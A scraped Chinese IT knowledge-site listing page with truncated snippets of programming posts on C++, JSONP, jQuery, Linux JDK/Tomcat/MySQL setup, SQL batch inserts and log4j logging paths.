http://developer.apple.com/iphone/library/qa/qa2009/qa1649.html 
Excerpt: 
 
 You are getting this warning because you probably added your Info.plist file to your Copy Bundle 
                                
                                2014之C++学习笔记（一）
                                    Etwo
C++EtwoEtwoiterator迭代器
                                            已经有很长一段时间没有写博客了，可能大家已经淡忘了Etwo这个人的存在，这一年多以来，本人从事了AS的相关开发工作，但最近一段时间，AS在天朝的没落，相信有很多码农也都清楚，现在的页游基本上达到饱和，手机上的游戏基本被unity3D与cocos占据，AS基本没有容身之处。so。。。最近我并不打算直接转型
                                
                                js跨越获取数据问题记录
                                    haifengwuch
jsonpjsonAjax
                                    js的跨越问题，普通的ajax无法获取服务器返回的值。 
 
  第一种解决方案，通过getson，后台配合方式，实现。 
Java后台代码： 
protected void doPost(HttpServletRequest req, HttpServletResponse resp) 
throws ServletException, IOException { 
String ca
                                
                                蓝色jQuery导航条
                                    ini
JavaScripthtmljqueryWebhtml5
                                    效果体验：http://keleyi.com/keleyi/phtml/jqtexiao/39.htmHTML文件代码： 
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>jQuery鼠标悬停上下滑动导航条 - 柯乐义<
                                
                                linux部署jdk,tomcat,mysql
                                    kerryg
jdktomcatlinuxmysql
                                    1、安装java环境jdk: 
    一般系统都会默认自带的JDK,但是不太好用，都会卸载了，然后重新安装。 
   1.1）、卸载： 
     （rpm -qa :查询已经安装哪些软件包； 
       rmp -q 软件包：查询指定包是否已
                                
                                DOMContentLoaded VS onload VS onreadystatechange
                                    mutongwu
jqueryjs
                                    1. DOMContentLoaded 在页面html、script、style加载完毕即可触发，无需等待所有资源（image/iframe）加载完毕。（IE9+） 
 
2. onload是最早支持的事件，要求所有资源加载完毕触发。 
 
3. onreadystatechange 开始在IE引入，后来其它浏览器也有一定的实现。涉及以下 document , applet, embed, fra
                                
                                sql批量插入数据
                                    qifeifei
批量插入
                                    hi， 
  自己在做工程的时候，遇到批量插入数据的数据修复场景。我的思路是在插入前准备一个临时表，临时表的整理就看当时的选择条件了，临时表就是要插入的数据集，最后再批量插入到数据库中。 
   
WITH tempT AS (
SELECT
item_id AS combo_id,
item_id,
now() AS create_date
FROM
a
                                
                                log4j打印日志文件 如何实现相对路径到 项目工程下
                                    thinkfreer
Weblog4j应用服务器日志
                                    最近为了实现统计一个网站的访问量，记录用户的登录信息，以方便站长实时了解自己网站的访问情况，选择了Apache 的log4j,但是在选择相对路径那块 卡主了，X度了好多方法(其实大多都是一样的内用，还一个字都不差的)，都没有能解决问题，无奈搞了2天终于解决了，与大家分享一下 
 
 
需求： 
用户登录该网站时，把用户的登录名,ip,时间。统计到一个txt文档里，以方便其他系统调用此txt。项目名
                                
                                linux下mysql-5.6.23.tar.gz安装与配置
                                    笑我痴狂
mysqllinuxunix
                                    1.卸载系统默认的mysql 
 
[root@localhost ~]# rpm -qa | grep mysql 
mysql-libs-5.1.66-2.el6_3.x86_64
mysql-devel-5.1.66-2.el6_3.x86_64
mysql-5.1.66-2.el6_3.x86_64
[root@localhost ~]# rpm -e mysql-libs-5.1
                                
                
            
        
    


    
        
            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    


    
        
            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.